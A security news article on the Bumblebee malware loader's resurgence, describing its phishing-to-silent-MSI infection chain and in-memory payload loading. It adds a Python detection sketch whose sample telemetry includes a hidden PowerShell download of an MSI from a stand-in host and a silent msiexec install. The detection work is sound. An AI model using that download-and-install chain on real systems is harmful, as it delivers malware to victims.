Bumblebee Malware Campaigns Resurface, Using Phishing and MSI Techniques to Deliver Silent Payloads
The Bumblebee malware, linked to ransomware deployments, has resurfaced after being disrupted in May 2024 by Europol's 'Operation Endgame.' The operation targeted multiple malware botnets, including Bumblebee, IcedID, and Pikabot, temporarily halting their activity. However, recent research from Netskope suggests that Bumblebee is back, employing familiar infection tactics such as phishing, malvertising, and SEO poisoning. Bumblebee is often used to give threat actors access to victim networks, enabling the deployment of payloads such as Cobalt Strike beacons, information-stealing malware, and ransomware. The resurgence of Bumblebee demonstrates its value to cybercriminals and the difficulty of deterring threat activity when no arrests are made: key actors remain free to re-establish infrastructure and adapt their tactics.
The attack chain observed in recent campaigns typically begins with a phishing email that entices the victim to download a ZIP archive. This archive contains an LNK file, which triggers a PowerShell 'Invoke-WebRequest' command to download and install a malicious .MSI file. The file is executed silently by the msiexec.exe process with the /qn option, allowing it to run without user interaction. A notable change in this version of Bumblebee is its stealthier technique, designed to avoid creating new processes that would leave forensic artifacts. "In the analyzed version, Bumblebee uses a stealthier approach to avoid the creation of other processes and avoids writing the final payload to disk," Netskope explains, "such as the rundll32 process being created by msiexec."
Netskope Threat Labs' analysis found that, once the MSI file is executed, Bumblebee uses the SelfReg table within the MSI structure to load the final DLL payload directly into memory, bypassing the need to write it to disk. The malware's unpacking process begins as soon as the DLL is invoked via the DllRegisterServer function. The most recent attacks analyzed by Netskope show that Bumblebee retains key traits from its previous versions, including the use of a hardcoded RC4 key ("NEW_BLACK") to decrypt its configuration, which includes campaign IDs such as "msi" and "lnk001." Although there is limited information on the payloads Bumblebee is currently delivering, the resurgence of the malware points to a potential increase in ransomware attacks and other high-impact cyber threats in the coming months.
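As an added illustration (not code from Netskope's report or from this article), the following Python sketch flags the stages of the chain described above in constructed Sysmon-style telemetry: a PowerShell download of an .msi, a silent msiexec /qn launch from a scripting parent or a user-writable path, and msiexec itself loading a DLL from a temp directory, which is what a SelfReg-driven in-process DllRegisterServer call looks like in image-load events. The event shapes, file paths and the example.invalid URL are assumptions made for the example.

```python
import re

# Constructed telemetry in a Sysmon-like shape (event 1 = process create, event 7 = image load).
# These records illustrate the chain the article describes; they are not data from Netskope's report.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'powershell -w hidden -c "Invoke-WebRequest http://example.invalid/setup.msi -OutFile $env:TEMP\s.msi"'},
    {"id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"msiexec /i C:\Users\alice\AppData\Local\Temp\s.msi /qn"},
    {"id": 7, "image": r"C:\Windows\System32\msiexec.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\MSI4F2A.tmp\reg.dll"},
    {"id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmd": r"msiexec /i C:\ProgramData\Deploy\agent.msi /qn"},  # benign: pushed by a deployment service
]

IWR_MSI = re.compile(r"(?i)\b(Invoke-WebRequest|iwr|curl|wget)\b.*\.msi\b")
SILENT_MSI = re.compile(r"(?i)(^|\s)/(qn|quiet)(\s|$)")
USER_WRITABLE = re.compile(r"(?i)\\(AppData\\Local\\Temp|Downloads|Users\\Public)\\")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, detail) pairs for each stage of the MSI chain seen in the events."""
    hits = []
    for ev in events:
        img = basename(ev["image"])
        if ev["id"] == 1 and img in ("powershell.exe", "pwsh.exe") and IWR_MSI.search(ev["cmd"]):
            hits.append(("powershell_downloads_msi", ev["cmd"]))
        if ev["id"] == 1 and img == "msiexec.exe" and SILENT_MSI.search(ev["cmd"]):
            # Silent installs are routine for deployment tooling; the signal is a scripting
            # parent or a package sitting in a user-writable location.
            if basename(ev["parent"]) in SCRIPT_HOSTS or USER_WRITABLE.search(ev["cmd"]):
                hits.append(("silent_msiexec_from_script", ev["cmd"]))
        if ev["id"] == 7 and img == "msiexec.exe" and USER_WRITABLE.search(ev["loaded"]):
            # A SelfReg entry makes msiexec load the DLL itself and call DllRegisterServer,
            # so the payload runs in-process and no rundll32 child appears in process telemetry.
            hits.append(("msiexec_loads_dll_from_temp", ev["loaded"]))
    return hits

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The benign fourth record shows why the /qn switch alone is not a usable signal: it is only flagged in combination with a scripting parent or a user-writable package path.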